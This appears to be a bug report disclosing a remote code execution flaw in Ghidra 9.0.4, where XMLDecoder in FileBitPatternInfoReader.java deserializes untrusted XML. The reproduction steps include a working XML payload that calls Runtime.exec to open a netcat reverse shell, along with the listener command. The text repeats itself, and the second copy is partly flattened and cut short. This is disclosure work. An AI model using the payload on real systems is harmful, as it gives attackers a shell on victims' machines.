Description:
XMLDecoder is used in FileBitPatternInfoReader.java which causes a Remote Code Execution in the Bit Patterns Explorer Plugin.
Steps to reproduce the behavior:
1: Open a binary with CodeBrowser
2. Go to Window->Script Manager and select the "DumpFunctionPatternInfoScript"
3. Export the resulted XML file.
4. Add the following at the end of the file, after the closing tag of the last object and before the </java> closing tag:
<object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 1337 -c ’/bin/bash’</string> </void> </object>
- Open local listening server with :
nc -lvnp 1337
- Go to Window->Function Bit Patterns Explorer (you will need to enable experimental mode from configuration first File->Configure...)
- In the opened plugin window, click "Read XML Files", point to the directory where the XML file was saved and click OK.
- Go back to the listener and see the shell opened.
Expected behavior
No code from the xml files should be executed while running this plugin.
Environment:
- OS: Kali Linux x86_64
- Java Version: 11.0.4
- Ghidra Version: 9.0.4
Description:
XMLDecoder is used in FileBitPatternInfoReader.java which causes a Remote Code Execution in the Bit Patterns Explorer Plugin.
Steps to reproduce the behavior:
1: Open a binary with CodeBrowser
2. Go to Window->Script Manager and select the "DumpFunctionPatternInfoScript"
3. Export the resulted XML file.
4. Add the following at the end of the file, after the closing tag of the last object and before the
</java>closing tag:<object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 1337 -c ’/bin/bash’</string> </void> </object>nc -lvnp 1337Expected behavior
No code from the xml files should be executed while running this plugin.
Environment: